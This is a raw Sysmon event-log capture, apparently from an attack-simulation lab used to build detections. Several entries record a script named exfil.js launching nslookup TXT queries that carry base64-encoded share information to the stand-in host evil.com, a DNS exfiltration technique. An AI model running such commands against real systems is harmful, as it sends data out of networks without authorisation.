14:16:32.094{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.094{2E1864BB-17A1-629A-783D-000000005F02}55522792C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-8640-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.108{2E1864BB-17C0-629A-8640-000000005F02}5064C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrid.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.094{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlayxz.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-17C0-629A-8440-000000005F02}66804188C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8540-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8540-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.063{2E1864BB-17C0-629A-8340-000000005F02}77005488C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-8540-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.068{2E1864BB-17C0-629A-8540-000000005F02}1144C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-8340-000000005F02}7700C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlayxz.tmp 2>&1 10341000x8000000000000000200570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.048{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8440-000000005F02}6680C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.048{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8440-000000005F02}6680C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.032{2E1864BB-17C0-629A-8440-000000005F02}66804188C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8340-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.032{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8440-000000005F02}6680C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8340-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-17A1-629A-783D-000000005F02}55527452C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-8340-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.022{2E1864BB-17C0-629A-8340-000000005F02}7700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlayxz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.016{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzygl.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043938Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:32.682{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58E7D3106F38262FC573EC39A7B9CCD2,SHA256=9B59EEC7E192FD0EAA35DE740F62B8F20CE914B9D13D66A09AC0F95258E9C400,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.981{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-C040-000000005F02}6168C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.981{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-C040-000000005F02}6168C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.981{2E1864BB-17C1-629A-C040-000000005F02}61687564C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-BF40-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.965{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-C040-000000005F02}6168C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BF40-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|